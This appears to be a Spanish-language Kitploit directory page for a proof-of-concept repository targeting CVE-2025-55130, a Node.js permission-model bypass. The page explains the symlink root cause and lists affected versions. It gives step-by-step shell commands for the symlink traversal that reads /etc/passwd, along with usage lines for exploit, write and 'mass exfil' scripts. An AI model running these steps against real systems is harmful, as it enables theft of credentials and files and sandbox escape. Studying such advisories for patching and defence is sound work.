Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55130 — PoC para CVE-2025-55130 | Kitploit
Herramientas/GitHubGitHub/scumfrog/cve-2025-55130
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExfiltración de DatosSeguridad WebEscape de Contenedores
GitHubscumfrog/cve-2025-55130

CVE-2025-55130

PoC para CVE-2025-55130

Ver Repositorio
1hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-55130 - Escape del Modelo de Permisos de Node.js mediante Enlaces Simbólicos

root@kitploit:~
   ___ _   _ ___     ____   ___ ____  ____      ____ ____ _ _____ ___  
  / __| | | | __|___/ _  \ / _ \___ \| ___|    | ___| ___/ |___ // _ \ 
 | (__| |_| | _|___| |_| || | | |__) |___ \ _____|__ \___ \ | |_ | | | |
  \___|\___/|___|   \__  ||_| |_|___/|_____|_____|__) |__) || |__) |_| |
                    |___/                       |____/____/|_|____/\___/ 
                                                                        
        Node.js Permission Model Bypass via Crafted Symlinks
                   [ Discovered by natann @ JFrog ]

Descripción general

Una falla de path traversal en Node.js permite salir de las restricciones de permiso de --allow-fs-read y --allow-fs-write mediante enlaces simbólicos que apuntan a rutas absolutas combinados con traversal relativo.

La comprobación de permisos y la resolución de rutas ocurren por separado. Una vez que la ruta inicial supera la comprobación de permisos, se sigue el enlace simbólico y las secuencias de traversal escapan del sandbox.

Versiones afectadas

RamaVulnerable

Análisis técnico

Causa raíz

root@kitploit:~
Permission Check:  ./nested/dirs/symlink/../../../etc/passwd
                   ^^^^^^^^^^^^^^^^^^ ALLOWED (starts with ./)
                   
Path Resolution:   /actual/path/to/script/../../../etc/passwd
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 
                   Resolves to /etc/passwd - OUTSIDE SANDBOX

El modelo de permisos valida la cadena de ruta antes de la resolución del enlace simbólico. Al crear un enlace simbólico a una ruta absoluta y usar traversal ../ DESPUÉS del enlace simbólico, logramos escapar del directorio permitido.

Flujo del ataque

root@kitploit:~
1. mkdir -p ./a/b/c/d/e/f/g           # Create nested dirs in allowed path
2. ln -s $(pwd) ./a/b/c/d/e/f/g/x     # Symlink to absolute path  
3. read ./a/b/c/d/e/f/g/x/../../../etc/passwd
         ^^^^^^^^^^^^^^^^^ 
         Permission check passes (inside ./)
         
   After symlink resolution:
   /home/user/project/../../../etc/passwd -> /etc/passwd
   ^^^^^^^^^^^^^^^^^^^^
   Traversal escapes to root

Archivos

ArchivoPropósito
exploit.jsExploit principal - leer archivos arbitrarios
exploit_write.js

Uso

root@kitploit:~
# Basic exploitation
node --permission --allow-fs-read=. --allow-fs-write=. exploit.js

# Check if vulnerable
node check.js

# Mass exfil
node --permission --allow-fs-read=. --allow-fs-write=. exfil.js

Impacto

  • Leer archivos sensibles: /etc/passwd, /etc/shadow, claves SSH, configuraciones
  • Escribir archivos arbitrarios: cron jobs, authorized_keys, configuraciones
  • Escape del contenedor en entornos multiinquilino
  • Bypass del sandbox para ejecución de código no confiable

Referencias

  • https://research.jfrog.com/vulnerabilities/nodejs-fs-permissions-bypass-cve-2025-55130/
  • https://nodejs.org/en/blog/vulnerability/december-2025-security-releases
  • https://nvd.nist.gov/vuln/detail/CVE-2025-55130

Créditos

  • Vulnerabilidad: Natan Nehorai (natann) @ JFrog Security Research
  • Corrección: RafaelGSS @ Node.js

Solo para investigación y pruebas autorizadas.

Descargar herramienta
Corregida
20.x< 20.20.020.20.0
22.x< 22.22.022.22.0
24.x< 24.13.024.13.0
25.x< 25.3.025.3.0
Escribir archivos arbitrarios
exfil.jsExfiltración masiva de archivos
check.jsComprobación de vulnerabilidad de versión